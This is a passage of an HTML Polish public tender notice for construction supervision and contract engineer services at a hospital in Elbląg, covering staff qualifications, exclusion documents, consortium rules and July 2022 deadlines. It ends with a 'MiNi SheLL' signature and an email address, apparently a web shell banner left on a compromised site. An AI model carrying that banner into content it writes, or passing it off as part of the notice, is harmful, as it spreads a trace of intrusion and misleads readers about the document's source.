wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych i co najmniej 5 letnim doświadczeniem jako inspektor nadzoru swojej branży przy budowie lub przebudowie obiektów budowlanych kubaturowych, <br/><br/>d)	Inspektorem nadzoru branży elektroenergetycznej z uprawnieniami budowlanymi o specjalności instalacyjnej bez ograniczeń w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych i co najmniej 5 letnim doświadczeniem jako inspektor nadzoru swojej branży przy budowie lub przebudowie obiektów budowlanych kubaturowych,<br/><br/>e)	Inspektorem nadzoru branży teletechnicznej z uprawnieniami o specjalności instalacyjnej bez ograniczeń w zakresie sieci, instalacji i urządzeń telekomunikacyjnych,<br/><br/>f)	Inspektorem nadzoru branży drogowej z uprawnieniami budowlanymi o specjalności drogowej bez ograniczeń, posiadający wykształcenie techniczne z co najmniej 3 letnim doświadczeniem jako inspektor nadzoru swojej branży przy nadzorowaniu robót drogowych. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu:<br/><br/>1)	odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie określonym w art. 109 ust. 1 pkt 4 ustawy Pzp, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji,<br/><br/>2)	oświadczenia Wykonawcy o braku przynależności do tej samej grupy kapitałowej (w zakresie art. 108 ust. 1 pkt. 5 ustawy Pzp), w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2020 r. poz. 1076 i 1086), z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej, którego wzór stanowi załącznik nr 6 do SWZ<br/><br/>3)	oświadczenia wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy, w zakresie podstaw wykluczenia z postępowania wskazanych przez zamawiającego, o których mowa w:art. 108 ust. 1 ustawy Pzp, którego wzór stanowi załącznik nr 5 do SWZ</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">4)	dokument potwierdzający uprawnienia Wykonawcy do prowadzenia działalności gospodarczej w zakresie usług ochrony osób i mienia, realizowanych w formie bezpośredniej ochrony fizycznej koncesja MSWiA na wykonywanie działalności gospodarczej w zakresie usług ochrony osób i mienia zgodni z ustawą z dnia 22 sierpnia 1997 roku (tekst jednolity: Dz . U. z 2014 r., poz. 1099 z póżn.zm) o ochronie osób i mienia<br/><br/>5)	wykaz wykonanych należycie w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, co najmniej 2 usług pełnienia funkcji Inżyniera Kontraktu*) na inwestycjach o łącznej wartości nie niższej niż 15 000 000,00 PLN brutto przy budowie lub przebudowie budynku wraz z instalacjami i urządzeniami oraz zarządzaniu i nadzorowaniu inwestycji budowlanych kubaturowych. Przedmiotowy wykaz należy złożyć w formularzu, którego wzór stanowi załącznik nr 7 do SWZ. Do wykazu usług należy dołączyć potwierdzenia, że usługi te zostały wykonane należycie.<br/><br/>6)	wykaz osób zdolnych do wykonania zamówienia, tj.:<br/>a)	Koordynatora Projektu, który okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, pełnił funkcję Koordynatora Projektu*) na min. 2 inwestycjach budowlanych kubaturowych.<br/>*) w przypadku użycia innego określenia niż „Koordynator Projektu” dotyczącego wykonanych usług, zakres zrealizowanych usług musi w swoim zakresie zawierać co najmniej:<br/>-	nadzór techniczny nad robotami budowlanymi i jakością ich wykonywania,<br/>-	nadzór nad całością dokumentacji sporządzanej przez wykonawcę,<br/>-	sprawowanie kontroli prawidłowości stosowania przepisów ustawy Pzp.<br/>b)	Inspektora nadzoru branży konstrukcyjno–budowlanej z uprawnieniami budowlanymi o specjalności konstrukcyjno-budowlanej bez ograniczeń z wykształceniem wyższym technicznym i co najmniej 5 letnim doświadczeniem jako inspektor nadzoru swojej branży przy budowie lub przebudowie obiektów budowlanych kubaturowych oraz posiada uprawnienia i doświadczenie oraz spełnia wymogi, o których mowa w art. 37c ustawy o ochronie zabytków i opiece nad zabytkami (Dz.U. z 2014 r. poz. 1446), tj.: posiada doświadczenie co najmniej 18 miesięczne w kierowaniu robotami budowlanymi prowadzonymi przy zabytkach nieruchomych wpisanych do rejestru zabytków nieruchomych,<br/>c)	Inspektora nadzoru branży sanitarnej z uprawnieniami budowlanymi o specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych i co najmniej 5 letnim doświadczeniem jako inspektor nadzoru swojej branży przy budowie lub przebudowie obiektów budowlanych kubaturowych, <br/>d)	Inspektora nadzoru branży elektroenergetycznej z uprawnieniami budowlanymi o specjalności instalacyjnej bez ograniczeń w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych i co najmniej 5 letnim doświadczeniem jako inspektor nadzoru swojej branży przy budowie lub przebudowie obiektów budowlanych kubaturowych,<br/>e)	Inspektora nadzoru branży teletechnicznej z uprawnieniami o specjalności instalacyjnej bez ograniczeń w zakresie sieci, instalacji i urządzeń telekomunikacyjnych,<br/>f)	Inspektora nadzoru branży drogowej z uprawnieniami budowlanymi o specjalności drogowej bez ograniczeń, posiadający wykształcenie techniczne z co najmniej 3 letnim doświadczeniem jako inspektor nadzoru swojej branży przy nadzorowaniu robót drogowych.<br/>Przedmiotowy wykaz należy złożyć w formularzu, którego wzór stanowi załącznik nr 8 do SWZ<br/><br/>7)	oświadczenie wykonawcy o dysponowaniu ubezpieczeniem odpowiedzialności cywilnej deliktowej i kontraktowej z tytułu prowadzonej działalności gospodarczej związanej z przedmiotem zamówienia na kwotę nie niższą niż 1.000.000 zł. Przedmiotowy wykaz należy złożyć w formularzu, którego wzór stanowi załącznik nr 9 do SWZ.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1)	Na ofertę składają się następujące dokumenty:<br/>a)	wypełniony formularz oferty – załącznik nr 1 do SWZ – w postaci elektronicznej opatrzony kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym,<br/>Do przygotowania oferty zaleca się wykorzystanie formularzy, których wzór stanowi Załącznik nr 1 do SWZ. W przypadku, gdy Wykonawca nie korzysta z przygotowanego przez Zamawiającego wzoru, w treści oferty należy zamieścić wszystkie informacje wymagane w Załączniku nr 1 do SWZ,<br/>b)	podmiotowe środki dowodowe, o których mowa w Rozdziale XII ust. 1 pkt. 1) SWZ, tj. <br/>	aktualne na dzień składania ofert oświadczenie o braku podstaw do wykluczenia z postępowania – zgodnie z Załącznikiem nr 3 do SWZ,<br/>	aktualne na dzień składania ofert oświadczenie o spełnianiu warunków udziału w postępowaniu – zgodnie z Załącznikiem nr 4 do SWZ.<br/>c)	jeżeli dotyczy - zobowiązanie podmiotu trzeciego do oddania swego zasobu na potrzeby wykonawcy składającego ofertę,<br/>d)	jeżeli dotyczy – pełnomocnictwo, upoważniające do złożenia oferty – w postaci elektronicznej opatrzone kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym,<br/>e)	pełnomocnictwo dla pełnomocnika do reprezentowania w postępowaniu Wykonawców wspólnie ubiegających się o udzielenie zamówienia - dotyczy ofert składanych przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia – w postaci elektronicznej opatrzone kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym, <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.<br/>2.	W takiej sytuacji Wykonawcy ustanawiają pełnomocnika (lidera) do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego oraz jej wykonania. <br/>3.	Wszelka korespondencja oraz rozliczenia dokonywane będą z pełnomocnikiem (liderem).<br/>4.	Żaden z Wykonawców wspólnie ubiegających się o udzielenie zamówienia nie może podlegać wykluczeniu z postępowania na podstawie art. 108 i art. 109 ust.1 pkt. 4 ustawy Pzp.<br/>5.	Oferta musi być podpisana w taki sposób, by wiązała prawnie wszystkich partnerów. Osoba podpisująca ofertę musi posiadać umocowanie prawne do reprezentacji. Umocowanie musi wynikać z treści pełnomocnictwa załączonego do oferty – treść pełnomocnictwa powinna dokładnie określać zakres umocowania. <br/>6.	Wszyscy partnerzy będą ponosić odpowiedzialność solidarną za wykonanie umowy zgodnie z jej postanowieniami.<br/>7.	Zamawiający może w ramach odpowiedzialności solidarnej żądać wykonania umowy w całości przez partnera kierującego lub od wszystkich partnerów łącznie lub każdego z osobna, albo też w inny sposób ustalony w umowie konsorcjum. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-07-06 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/szpitalmiejski_elblag</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-07-06 09:05</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-08-04</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com